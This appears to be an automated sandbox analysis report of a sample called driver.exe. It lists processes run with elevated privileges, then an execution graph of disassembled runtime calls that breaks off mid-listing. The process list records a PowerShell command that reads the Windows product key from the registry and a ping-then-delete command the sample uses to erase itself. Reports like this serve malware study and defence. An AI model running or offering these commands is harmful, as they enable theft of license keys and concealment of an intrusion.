                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:94
                                                                                                                                                                                                                                              Start time:05:00:38
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:95
                                                                                                                                                                                                                                              Start time:05:00:38
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:96
                                                                                                                                                                                                                                              Start time:05:00:41
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:97
                                                                                                                                                                                                                                              Start time:05:00:41
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:98
                                                                                                                                                                                                                                              Start time:05:00:41
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:ping localhost -n 3
                                                                                                                                                                                                                                              Imagebase:0x7ff6f41b0000
                                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:9.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:19.6%
                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                Total number of Limit Nodes:39
                                                                                                                                                                                                                                                execution_graph 19594 7ff6a29dadd9 19597 7ff6a29c54e8 LeaveCriticalSection 19594->19597 20445 7ff6a29dae6e 20446 7ff6a29dae7d 20445->20446 20447 7ff6a29dae87 20445->20447 20449 7ff6a29d03a8 LeaveCriticalSection 20446->20449 19606 7ff6a29bcbc0 19607 7ff6a29bcbd0 19606->19607 19623 7ff6a29c9c18 19607->19623 19609 7ff6a29bcbdc 19629 7ff6a29bceb8 19609->19629 19611 7ff6a29bd19c 7 API calls 19613 7ff6a29bcc75 19611->19613 19612 7ff6a29bcbf4 _RTC_Initialize 19621 7ff6a29bcc49 19612->19621 19634 7ff6a29bd068 19612->19634 19615 7ff6a29bcc09 19637 7ff6a29c9084 19615->19637 19621->19611 19622 7ff6a29bcc65 19621->19622 19624 7ff6a29c9c29 19623->19624 19625 7ff6a29c9c31 19624->19625 19626 7ff6a29c4f78 _get_daylight 11 API calls 19624->19626 19625->19609 19627 7ff6a29c9c40 19626->19627 19628 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19627->19628 19628->19625 19630 7ff6a29bcec9 19629->19630 19633 7ff6a29bcece __scrt_release_startup_lock 19629->19633 19631 7ff6a29bd19c 7 API calls 19630->19631 19630->19633 19632 7ff6a29bcf42 19631->19632 19633->19612 19662 7ff6a29bd02c 19634->19662 19636 7ff6a29bd071 19636->19615 19638 7ff6a29c90a4 19637->19638 19645 7ff6a29bcc15 19637->19645 19639 7ff6a29c90c2 GetModuleFileNameW 19638->19639 19640 7ff6a29c90ac 19638->19640 19644 7ff6a29c90ed 19639->19644 19641 7ff6a29c4f78 _get_daylight 11 API calls 19640->19641 19642 7ff6a29c90b1 19641->19642 19643 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19642->19643 19643->19645 19677 7ff6a29c9024 19644->19677 19645->19621 19661 7ff6a29bd13c InitializeSListHead 19645->19661 19648 7ff6a29c9135 19649 7ff6a29c4f78 _get_daylight 11 API calls 19648->19649 19650 7ff6a29c913a 19649->19650 19651 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19650->19651 19651->19645 19652 7ff6a29c914d 19653 7ff6a29c916f 19652->19653 19655 7ff6a29c91b4 19652->19655 19656 7ff6a29c919b 19652->19656 19654 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19653->19654 19654->19645 19659 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19655->19659 19657 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19656->19657 19658 7ff6a29c91a4 19657->19658 19660 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19658->19660 19659->19653 19660->19645 19663 7ff6a29bd046 19662->19663 19665 7ff6a29bd03f 19662->19665 19666 7ff6a29ca25c 19663->19666 19665->19636 19669 7ff6a29c9e98 19666->19669 19676 7ff6a29d0348 EnterCriticalSection 19669->19676 19678 7ff6a29c903c 19677->19678 19682 7ff6a29c9074 19677->19682 19679 7ff6a29cec08 _get_daylight 11 API calls 19678->19679 19678->19682 19680 7ff6a29c906a 19679->19680 19681 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19680->19681 19681->19682 19682->19648 19682->19652 19683 7ff6a29c9dc0 19686 7ff6a29c9d3c 19683->19686 19693 7ff6a29d0348 EnterCriticalSection 19686->19693 20450 7ff6a29cb040 20451 7ff6a29cb045 20450->20451 20452 7ff6a29cb05a 20450->20452 20456 7ff6a29cb060 20451->20456 20457 7ff6a29cb0a2 20456->20457 20458 7ff6a29cb0aa 20456->20458 20459 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20457->20459 20460 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20458->20460 20459->20458 20461 7ff6a29cb0b7 20460->20461 20462 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20461->20462 20463 7ff6a29cb0c4 20462->20463 20464 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20463->20464 20465 7ff6a29cb0d1 20464->20465 20466 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20465->20466 20467 7ff6a29cb0de 20466->20467 20468 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20467->20468 20469 7ff6a29cb0eb 20468->20469 20470 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20469->20470 20471 7ff6a29cb0f8 20470->20471 20472 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20471->20472 20473 7ff6a29cb105 20472->20473 20474 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20473->20474 20475 7ff6a29cb115 20474->20475 20476 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20475->20476 20477 7ff6a29cb125 20476->20477 20482 7ff6a29caf04 20477->20482 20496 7ff6a29d0348 EnterCriticalSection 20482->20496 18855 7ff6a29d0938 18856 7ff6a29d095c 18855->18856 18859 7ff6a29d096c 18855->18859 18857 7ff6a29c4f78 _get_daylight 11 API calls 18856->18857 18858 7ff6a29d0961 18857->18858 18860 7ff6a29d0c4c 18859->18860 18861 7ff6a29d098e 18859->18861 18862 7ff6a29c4f78 _get_daylight 11 API calls 18860->18862 18863 7ff6a29d09af 18861->18863 18986 7ff6a29d0ff4 18861->18986 18864 7ff6a29d0c51 18862->18864 18867 7ff6a29d0a21 18863->18867 18869 7ff6a29d09d5 18863->18869 18876 7ff6a29d0a15 18863->18876 18866 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18864->18866 18866->18858 18872 7ff6a29cec08 _get_daylight 11 API calls 18867->18872 18884 7ff6a29d09e4 18867->18884 18868 7ff6a29d0ace 18880 7ff6a29d0aeb 18868->18880 18885 7ff6a29d0b3d 18868->18885 19001 7ff6a29c9730 18869->19001 18873 7ff6a29d0a37 18872->18873 18877 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18873->18877 18875 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18875->18858 18876->18868 18876->18884 19007 7ff6a29d719c 18876->19007 18881 7ff6a29d0a45 18877->18881 18878 7ff6a29d09df 18882 7ff6a29c4f78 _get_daylight 11 API calls 18878->18882 18879 7ff6a29d09fd 18879->18876 18887 7ff6a29d0ff4 45 API calls 18879->18887 18883 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18880->18883 18881->18876 18881->18884 18889 7ff6a29cec08 _get_daylight 11 API calls 18881->18889 18882->18884 18886 7ff6a29d0af4 18883->18886 18884->18875 18885->18884 18888 7ff6a29d344c 40 API calls 18885->18888 18897 7ff6a29d0af9 18886->18897 19043 7ff6a29d344c 18886->19043 18887->18876 18890 7ff6a29d0b7a 18888->18890 18891 7ff6a29d0a67 18889->18891 18892 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18890->18892 18894 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18891->18894 18895 7ff6a29d0b84 18892->18895 18894->18876 18895->18884 18895->18897 18896 7ff6a29d0c40 18900 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18896->18900 18897->18896 18901 7ff6a29cec08 _get_daylight 11 API calls 18897->18901 18898 7ff6a29d0b25 18899 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18898->18899 18899->18897 18900->18858 18902 7ff6a29d0bc8 18901->18902 18903 7ff6a29d0bd0 18902->18903 18904 7ff6a29d0bd9 18902->18904 18905 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18903->18905 18906 7ff6a29ca514 __std_exception_copy 37 API calls 18904->18906 18907 7ff6a29d0bd7 18905->18907 18908 7ff6a29d0be8 18906->18908 18912 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18907->18912 18909 7ff6a29d0bf0 18908->18909 18910 7ff6a29d0c7b 18908->18910 19052 7ff6a29d72b4 18909->19052 18911 7ff6a29ca970 _isindst 17 API calls 18910->18911 18914 7ff6a29d0c8f 18911->18914 18912->18858 18916 7ff6a29d0cb8 18914->18916 18924 7ff6a29d0cc8 18914->18924 18919 7ff6a29c4f78 _get_daylight 11 API calls 18916->18919 18917 7ff6a29d0c17 18921 7ff6a29c4f78 _get_daylight 11 API calls 18917->18921 18918 7ff6a29d0c38 18920 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18918->18920 18948 7ff6a29d0cbd 18919->18948 18920->18896 18922 7ff6a29d0c1c 18921->18922 18923 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18922->18923 18923->18907 18925 7ff6a29d0fab 18924->18925 18926 7ff6a29d0cea 18924->18926 18927 7ff6a29c4f78 _get_daylight 11 API calls 18925->18927 18928 7ff6a29d0d07 18926->18928 19071 7ff6a29d10dc 18926->19071 18929 7ff6a29d0fb0 18927->18929 18932 7ff6a29d0d7b 18928->18932 18933 7ff6a29d0d2f 18928->18933 18938 7ff6a29d0d6f 18928->18938 18931 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18929->18931 18931->18948 18936 7ff6a29d0da3 18932->18936 18939 7ff6a29cec08 _get_daylight 11 API calls 18932->18939 18953 7ff6a29d0d3e 18932->18953 19086 7ff6a29c976c 18933->19086 18934 7ff6a29d0e2e 18947 7ff6a29d0e4b 18934->18947 18954 7ff6a29d0e9e 18934->18954 18936->18938 18941 7ff6a29cec08 _get_daylight 11 API calls 18936->18941 18936->18953 18938->18934 18938->18953 19092 7ff6a29d705c 18938->19092 18943 7ff6a29d0d95 18939->18943 18946 7ff6a29d0dc5 18941->18946 18942 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18942->18948 18949 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18943->18949 18944 7ff6a29d0d57 18944->18938 18956 7ff6a29d10dc 45 API calls 18944->18956 18945 7ff6a29d0d39 18950 7ff6a29c4f78 _get_daylight 11 API calls 18945->18950 18951 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18946->18951 18952 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18947->18952 18949->18936 18950->18953 18951->18938 18955 7ff6a29d0e54 18952->18955 18953->18942 18954->18953 18957 7ff6a29d344c 40 API calls 18954->18957 18959 7ff6a29d344c 40 API calls 18955->18959 18962 7ff6a29d0e5a 18955->18962 18956->18938 18958 7ff6a29d0edc 18957->18958 18960 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18958->18960 18963 7ff6a29d0e86 18959->18963 18964 7ff6a29d0ee6 18960->18964 18961 7ff6a29d0f9f 18966 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18961->18966 18962->18961 18967 7ff6a29cec08 _get_daylight 11 API calls 18962->18967 18965 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18963->18965 18964->18953 18964->18962 18965->18962 18966->18948 18968 7ff6a29d0f2b 18967->18968 18969 7ff6a29d0f33 18968->18969 18970 7ff6a29d0f3c 18968->18970 18971 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18969->18971 18972 7ff6a29d04e4 37 API calls 18970->18972 18973 7ff6a29d0f3a 18971->18973 18974 7ff6a29d0f4a 18972->18974 18978 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18973->18978 18975 7ff6a29d0f52 SetEnvironmentVariableW 18974->18975 18976 7ff6a29d0fdf 18974->18976 18979 7ff6a29d0f76 18975->18979 18980 7ff6a29d0f97 18975->18980 18977 7ff6a29ca970 _isindst 17 API calls 18976->18977 18981 7ff6a29d0ff3 18977->18981 18978->18948 18983 7ff6a29c4f78 _get_daylight 11 API calls 18979->18983 18982 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18980->18982 18982->18961 18984 7ff6a29d0f7b 18983->18984 18985 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18984->18985 18985->18973 18987 7ff6a29d1011 18986->18987 18988 7ff6a29d1029 18986->18988 18987->18863 18989 7ff6a29cec08 _get_daylight 11 API calls 18988->18989 18996 7ff6a29d104d 18989->18996 18990 7ff6a29d10d2 18992 7ff6a29ca574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18990->18992 18991 7ff6a29d10ae 18993 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18991->18993 18994 7ff6a29d10d8 18992->18994 18993->18987 18995 7ff6a29cec08 _get_daylight 11 API calls 18995->18996 18996->18990 18996->18991 18996->18995 18997 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18996->18997 18998 7ff6a29ca514 __std_exception_copy 37 API calls 18996->18998 18999 7ff6a29d10bd 18996->18999 18997->18996 18998->18996 19000 7ff6a29ca970 _isindst 17 API calls 18999->19000 19000->18990 19002 7ff6a29c9740 19001->19002 19006 7ff6a29c9749 19001->19006 19002->19006 19116 7ff6a29c9208 19002->19116 19006->18878 19006->18879 19008 7ff6a29d62c4 19007->19008 19009 7ff6a29d71a9 19007->19009 19010 7ff6a29d62d1 19008->19010 19017 7ff6a29d6307 19008->19017 19011 7ff6a29c4fbc 45 API calls 19009->19011 19014 7ff6a29c4f78 _get_daylight 11 API calls 19010->19014 19030 7ff6a29d6278 19010->19030 19013 7ff6a29d71dd 19011->19013 19012 7ff6a29d6331 19016 7ff6a29c4f78 _get_daylight 11 API calls 19012->19016 19018 7ff6a29d71e2 19013->19018 19022 7ff6a29d71f3 19013->19022 19026 7ff6a29d720a 19013->19026 19015 7ff6a29d62db 19014->19015 19019 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19015->19019 19020 7ff6a29d6336 19016->19020 19017->19012 19021 7ff6a29d6356 19017->19021 19018->18876 19024 7ff6a29d62e6 19019->19024 19025 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19020->19025 19031 7ff6a29c4fbc 45 API calls 19021->19031 19032 7ff6a29d6341 19021->19032 19023 7ff6a29c4f78 _get_daylight 11 API calls 19022->19023 19027 7ff6a29d71f8 19023->19027 19024->18876 19025->19032 19028 7ff6a29d7214 19026->19028 19029 7ff6a29d7226 19026->19029 19033 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19027->19033 19034 7ff6a29c4f78 _get_daylight 11 API calls 19028->19034 19035 7ff6a29d724e 19029->19035 19036 7ff6a29d7237 19029->19036 19030->18876 19031->19032 19032->18876 19033->19018 19037 7ff6a29d7219 19034->19037 19358 7ff6a29d8fbc 19035->19358 19349 7ff6a29d6314 19036->19349 19041 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19037->19041 19041->19018 19042 7ff6a29c4f78 _get_daylight 11 API calls 19042->19018 19044 7ff6a29d346e 19043->19044 19045 7ff6a29d348b 19043->19045 19044->19045 19047 7ff6a29d347c 19044->19047 19046 7ff6a29d3495 19045->19046 19398 7ff6a29d7ca8 19045->19398 19405 7ff6a29d7ce4 19046->19405 19049 7ff6a29c4f78 _get_daylight 11 API calls 19047->19049 19051 7ff6a29d3481 __scrt_get_show_window_mode 19049->19051 19051->18898 19053 7ff6a29c4fbc 45 API calls 19052->19053 19054 7ff6a29d731a 19053->19054 19055 7ff6a29d7328 19054->19055 19417 7ff6a29cef94 19054->19417 19420 7ff6a29c551c 19055->19420 19059 7ff6a29d7414 19062 7ff6a29d7425 19059->19062 19064 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19059->19064 19060 7ff6a29c4fbc 45 API calls 19061 7ff6a29d7397 19060->19061 19066 7ff6a29cef94 5 API calls 19061->19066 19067 7ff6a29d73a0 19061->19067 19063 7ff6a29d0c13 19062->19063 19065 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19062->19065 19063->18917 19063->18918 19064->19062 19065->19063 19066->19067 19068 7ff6a29c551c 14 API calls 19067->19068 19069 7ff6a29d73fb 19068->19069 19069->19059 19070 7ff6a29d7403 SetEnvironmentVariableW 19069->19070 19070->19059 19072 7ff6a29d10ff 19071->19072 19073 7ff6a29d111c 19071->19073 19072->18928 19074 7ff6a29cec08 _get_daylight 11 API calls 19073->19074 19079 7ff6a29d1140 19074->19079 19075 7ff6a29d11a1 19077 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19075->19077 19076 7ff6a29ca574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19078 7ff6a29d11ca 19076->19078 19077->19072 19079->19075 19080 7ff6a29cec08 _get_daylight 11 API calls 19079->19080 19081 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19079->19081 19082 7ff6a29d04e4 37 API calls 19079->19082 19083 7ff6a29d11b0 19079->19083 19085 7ff6a29d11c4 19079->19085 19080->19079 19081->19079 19082->19079 19084 7ff6a29ca970 _isindst 17 API calls 19083->19084 19084->19085 19085->19076 19087 7ff6a29c9785 19086->19087 19088 7ff6a29c977c 19086->19088 19087->18944 19087->18945 19088->19087 19442 7ff6a29c927c 19088->19442 19093 7ff6a29d7069 19092->19093 19096 7ff6a29d7096 19092->19096 19094 7ff6a29d706e 19093->19094 19093->19096 19095 7ff6a29c4f78 _get_daylight 11 API calls 19094->19095 19098 7ff6a29d7073 19095->19098 19097 7ff6a29d70da 19096->19097 19100 7ff6a29d70f9 19096->19100 19114 7ff6a29d70ce __crtLCMapStringW 19096->19114 19099 7ff6a29c4f78 _get_daylight 11 API calls 19097->19099 19101 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19098->19101 19102 7ff6a29d70df 19099->19102 19103 7ff6a29d7103 19100->19103 19104 7ff6a29d7115 19100->19104 19105 7ff6a29d707e 19101->19105 19107 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19102->19107 19108 7ff6a29c4f78 _get_daylight 11 API calls 19103->19108 19106 7ff6a29c4fbc 45 API calls 19104->19106 19105->18938 19109 7ff6a29d7122 19106->19109 19107->19114 19110 7ff6a29d7108 19108->19110 19109->19114 19489 7ff6a29d8b78 19109->19489 19111 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19110->19111 19111->19114 19114->18938 19115 7ff6a29c4f78 _get_daylight 11 API calls 19115->19114 19117 7ff6a29c9221 19116->19117 19130 7ff6a29c921d 19116->19130 19139 7ff6a29d2660 19117->19139 19122 7ff6a29c9233 19124 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19122->19124 19123 7ff6a29c923f 19165 7ff6a29c92ec 19123->19165 19124->19130 19127 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19128 7ff6a29c9266 19127->19128 19129 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19128->19129 19129->19130 19130->19006 19131 7ff6a29c955c 19130->19131 19132 7ff6a29c9585 19131->19132 19137 7ff6a29c959e 19131->19137 19132->19006 19133 7ff6a29cec08 _get_daylight 11 API calls 19133->19137 19134 7ff6a29c962e 19136 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19134->19136 19135 7ff6a29d0858 WideCharToMultiByte 19135->19137 19136->19132 19137->19132 19137->19133 19137->19134 19137->19135 19138 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19137->19138 19138->19137 19140 7ff6a29d266d 19139->19140 19141 7ff6a29c9226 19139->19141 19184 7ff6a29cb294 19140->19184 19145 7ff6a29d299c GetEnvironmentStringsW 19141->19145 19146 7ff6a29c922b 19145->19146 19148 7ff6a29d29cc 19145->19148 19146->19122 19146->19123 19147 7ff6a29d0858 WideCharToMultiByte 19149 7ff6a29d2a1d 19147->19149 19148->19147 19148->19148 19150 7ff6a29d2a24 FreeEnvironmentStringsW 19149->19150 19151 7ff6a29cd66c _fread_nolock 12 API calls 19149->19151 19150->19146 19152 7ff6a29d2a37 19151->19152 19153 7ff6a29d2a3f 19152->19153 19154 7ff6a29d2a48 19152->19154 19155 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19153->19155 19156 7ff6a29d0858 WideCharToMultiByte 19154->19156 19157 7ff6a29d2a46 19155->19157 19158 7ff6a29d2a6b 19156->19158 19157->19150 19159 7ff6a29d2a6f 19158->19159 19160 7ff6a29d2a79 19158->19160 19162 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19159->19162 19161 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19160->19161 19163 7ff6a29d2a77 FreeEnvironmentStringsW 19161->19163 19162->19163 19163->19146 19166 7ff6a29c9311 19165->19166 19167 7ff6a29cec08 _get_daylight 11 API calls 19166->19167 19178 7ff6a29c9347 19167->19178 19168 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19169 7ff6a29c9247 19168->19169 19169->19127 19170 7ff6a29c93c2 19171 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19170->19171 19171->19169 19172 7ff6a29cec08 _get_daylight 11 API calls 19172->19178 19173 7ff6a29c93b1 19343 7ff6a29c9518 19173->19343 19175 7ff6a29ca514 __std_exception_copy 37 API calls 19175->19178 19177 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19181 7ff6a29c934f 19177->19181 19178->19170 19178->19172 19178->19173 19178->19175 19179 7ff6a29c93e7 19178->19179 19180 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19178->19180 19178->19181 19182 7ff6a29ca970 _isindst 17 API calls 19179->19182 19180->19178 19181->19168 19183 7ff6a29c93fa 19182->19183 19185 7ff6a29cb2a5 FlsGetValue 19184->19185 19186 7ff6a29cb2c0 FlsSetValue 19184->19186 19187 7ff6a29cb2b2 19185->19187 19188 7ff6a29cb2ba 19185->19188 19186->19187 19189 7ff6a29cb2cd 19186->19189 19190 7ff6a29ca574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19187->19190 19193 7ff6a29cb2b8 19187->19193 19188->19186 19191 7ff6a29cec08 _get_daylight 11 API calls 19189->19191 19194 7ff6a29cb335 19190->19194 19192 7ff6a29cb2dc 19191->19192 19195 7ff6a29cb2fa FlsSetValue 19192->19195 19196 7ff6a29cb2ea FlsSetValue 19192->19196 19204 7ff6a29d2334 19193->19204 19198 7ff6a29cb306 FlsSetValue 19195->19198 19199 7ff6a29cb318 19195->19199 19197 7ff6a29cb2f3 19196->19197 19200 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19197->19200 19198->19197 19201 7ff6a29caf64 _get_daylight 11 API calls 19199->19201 19200->19187 19202 7ff6a29cb320 19201->19202 19203 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19202->19203 19203->19193 19227 7ff6a29d25a4 19204->19227 19206 7ff6a29d2369 19242 7ff6a29d2034 19206->19242 19209 7ff6a29cd66c _fread_nolock 12 API calls 19210 7ff6a29d2397 19209->19210 19211 7ff6a29d239f 19210->19211 19214 7ff6a29d23ae 19210->19214 19212 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19211->19212 19213 7ff6a29d2386 19212->19213 19213->19141 19249 7ff6a29d26dc 19214->19249 19217 7ff6a29d24aa 19218 7ff6a29c4f78 _get_daylight 11 API calls 19217->19218 19220 7ff6a29d24af 19218->19220 19219 7ff6a29d2505 19222 7ff6a29d256c 19219->19222 19260 7ff6a29d1e64 19219->19260 19223 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19220->19223 19221 7ff6a29d24c4 19221->19219 19224 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19221->19224 19226 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19222->19226 19223->19213 19224->19219 19226->19213 19228 7ff6a29d25c7 19227->19228 19229 7ff6a29d25d1 19228->19229 19275 7ff6a29d0348 